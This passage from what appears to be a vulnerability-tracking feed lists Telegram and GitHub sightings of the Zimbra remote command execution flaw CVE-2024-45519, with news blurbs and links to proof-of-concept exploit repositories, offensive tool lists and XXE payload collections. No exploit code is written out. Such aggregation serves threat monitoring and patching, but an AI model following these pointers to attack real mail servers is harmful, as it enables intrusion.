"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aZimbra - Remote Command Execution (CVE-2024-45519)\nURL\uff1ahttps://github.com/Chocapikk/CVE-2024-45519\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-05T00:20:30.000000Z"}, {"uuid": "2c366797-e715-49f7-a2a2-a0470643cf11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/kasperskyb2b/1441", "content": "\u23e9 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83e\udd2f \u041e\u0431\u044b\u0447\u043d\u043e \u043c\u044b \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u043c \u043d\u043e\u0432\u043e\u0441\u0442\u0438 APT \u0431\u0435\u0437 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432, \u043d\u043e \u0442\u0443\u0442 \u0443\u0436 \u0431\u043e\u043b\u044c\u043d\u043e \u0443\u0432\u043b\u0435\u043a\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0441\u044e\u0436\u0435\u0442. 
WSJ \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u0438 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0430\u0442\u0430\u043a APT Salt Typhoon \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0446\u0435\u0432, \u043f\u043e\u043b\u044c\u0437\u0443\u044f\u0441\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 \u0441\u0435\u0442\u044f\u0445 AT&amp;T, Verizon \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u043a\u0438 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438\u043c\u0438 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 (\u0430\u043d\u0430\u043b\u043e\u0433 \u0421\u041e\u0420\u041c). 
\u042d\u0442\u043e \u2014 \u0445\u043e\u0440\u043e\u0448\u0435\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0431\u044d\u043a\u0434\u043e\u0440 \u0434\u043b\u044f \u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0434\u043d\u043e\u0433\u043e, \u0440\u0430\u043d\u043e \u0438\u043b\u0438 \u043f\u043e\u0437\u0434\u043d\u043e \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0434\u043b\u044f \u0432\u0441\u0435\u0445.\n\n\ud83d\udc7d SIEM \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0435 \u0437\u043b\u043e\u0434\u0435\u0435\u0432: \u0432 \u043d\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0438 \u0441\u0431\u043e\u0440\u0430 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u043b\u0438\u0435\u043d\u0442 open source SIEM Wazuh. 
\u041a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0446\u0435\u043b\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433.\n\n\ud83d\ude2e Cloudflare \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0441\u044c \u043e \u0431\u043e\u0440\u044c\u0431\u0435 \u0441 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u0439 DDoS-\u0430\u0442\u0430\u043a\u043e\u0439 \u0430\u0436 \u043d\u0430 3,8 \u0422\u0431/\u0441.\n\n\ud83d\udc7e \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u0441\u0441\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u044e\u0442 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u043c\u0438 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u044b\u043c\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. \u0411\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430\u0439\u0434\u0435\u043d\u043e \u0432 \u0421\u0428\u0410, \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435 \u0438 \u0428\u0432\u0435\u0446\u0438\u0438, \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0434\u0435\u0432\u0430\u0439\u0441\u044b \u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0435 \u2014 Asus \u0438 Qnap. 
\u041d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0412\u041f\u041e GobRAT \u0438 Bulbature. \n\n\u0410 \u0412\u041f\u041e perfctl \u0443\u0436\u0435 \u0442\u0440\u0438 \u0433\u043e\u0434\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0437\u0430\u0440\u0430\u0436\u0430\u0435\u0442 Linux-\u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f 20 \u0442\u044b\u0441\u044f\u0447 \u043e\u0448\u0438\u0431\u043e\u043a \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438.  \u041f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0412\u041f\u041e \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0440\u0443\u0442\u043a\u0438\u0442\u043e\u043c \u0438 \u0446\u0435\u043b\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0434\u0440\u0443\u0433\u0438\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u0434\u043b\u044f \u043c\u0430\u043a\u0441\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0441\u0442\u0438. 
\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0435\u0440.\n\n\u0412 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u043d\u0435\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 APT Mustang Panda, \u043d\u0430\u0448\u0451\u043b\u0441\u044f \u043a\u043b\u0430\u0441\u0442\u0435\u0440, \u0432\u0438\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0439 \u043d\u043e\u0432\u043e\u0439 \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u0435, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 CeranaKeeper. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0434\u043b\u044f \u04212 \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. 
\n\n\ud83d\udc6e\u200d\u2640\ufe0f\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043d\u043e\u0432\u044b\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 \u0438 \u0430\u0442\u0430\u043a Akira ransomware: TTP, IoC, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0445\u0430\u043d\u0442\u0438\u043d\u0433\u0443.\n\n\u2328\ufe0f\u041e\u0431\u0437\u043e\u0440 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 CyberVolk, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430\u0447\u0438\u043d\u0430\u043b\u0430 \u0441 \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0437\u043c\u0430, \u0430 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 ransomware.\n\n\ud83d\ude93 \u041e\u043a\u043e\u043b\u043e 5% \u0432\u0441\u0435\u0445 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0449\u0438\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Magento/Adobe Commerce, \u0431\u044b\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u044b \u044d\u0442\u0438\u043c \u043b\u0435\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u0435\u0431-\u0441\u043a\u0438\u043c\u043c\u0435\u0440 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043e\u043f\u043b\u0430\u0442\u044b. 
\u0420\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043d\u0430\u043f\u0435\u0440\u0435\u0433\u043e\u043d\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 CVE-2024-34102 (CosmicSting).\n\n\ud83c\udf44 FIN7 \u043b\u043e\u0432\u0438\u0442 \u043d\u0430 \u043a\u043b\u0443\u0431\u043d\u0438\u0447\u043a\u0443: \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 NetSupport RAT \u0447\u0435\u0440\u0435\u0437 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0438\u043f\u0444\u0435\u0439\u043a-\u043e\u0431\u043d\u0430\u0436\u0451\u043d\u043a\u0438.\n\n\ud83d\udcf1 \u0410 \u0432 App Store \u0438 Google Play \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0442\u0440\u0435\u0439\u0434\u0438\u043d\u0433\u0430 \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0438\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0445\u0435\u043c pig butchering.\n\n\ud83c\udf83\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u0432: StealC (\u0430\u0436 \u0432 \u0442\u0440\u0451\u0445 
\u0447\u0430\u0441\u0442\u044f\u0445) \u0438 Amnesia.\n\n\ud83d\udc40 \u041d\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0432\u0443\u0445 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:  CVE-2024-29824 \u0432 Ivanti Endpoint Manager \u0438 CVE-2024-45519 \u0432 \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Zimbra.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-10-07T15:36:21.000000Z"}, {"uuid": "04311642-8f5b-45c0-be54-d4338b40a44a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ton618cyber/4940", "content": "Researchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nUrgent patching is needed for Zimbra Collaboration as attackers exploit CVE-2024-45519 to execute commands.\n\nthehackernews.com \u2022 Oct 2, 2024", "creation_timestamp": "2024-10-02T16:48:09.000000Z"}, {"uuid": "dd8a9ac2-c136-4325-8fbc-9d100a00494b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/4921", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-&gt; https://github.com/p33d/CVE-2024-45519\n\n2. 
CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:48.000000Z"}, {"uuid": "76c65d80-cc55-42ff-84aa-2d02ae7fcddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2101", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "999125f8-3ec7-474c-8092-ddc645a63a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/515", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-30T10:20:42.000000Z"}, {"uuid": "f9a2854f-8cd6-4438-9fa4-4822c7fdd918", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/z3xploit/668", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit \ud83c\udf4e\n\nExploit\n\n#Poc #cve #exploit", "creation_timestamp": "2024-10-10T09:54:11.000000Z"}, {"uuid": "b45bf6e4-3b0b-4ddb-b7ce-5d79dff924af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/1ZL9Gy8NcGFZ3EukYR7KgdreC6GML4uuvOnd8ACoqLrL-Q", "content": "", "creation_timestamp": "2024-10-02T10:21:54.000000Z"}, {"uuid": "a4dac830-028a-4c1d-bdc6-f614decfad2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1074", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:25:19.000000Z"}, {"uuid": "0458c5ef-1991-41a3-9170-ffa4261d9d6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1039", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! 
\n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:\u00a0 Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n\nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:39.000000Z"}, {"uuid": "688c45af-1f4a-4f72-8e5f-485bf7fc60d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/4798", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. 
The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "56ac5916-1a1e-4506-b444-b531268bb273", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/24042", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}, {"uuid": "d34a10d4-104b-41ae-98dd-4a2663178ad6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/23977", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": 
"7598bcc1-5af5-4de4-9335-19feb9130f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/23976", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:07.000000Z"}, {"uuid": "1e6baebe-8452-448c-89a6-d49e4d90651e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3798", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:24.000000Z"}, {"uuid": "71431c22-8ea8-4169-a8af-961c7b222726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 
"CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3783", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:15.000000Z"}, {"uuid": "82940bad-130e-40cd-8064-c1dbc248b1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7519", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - 
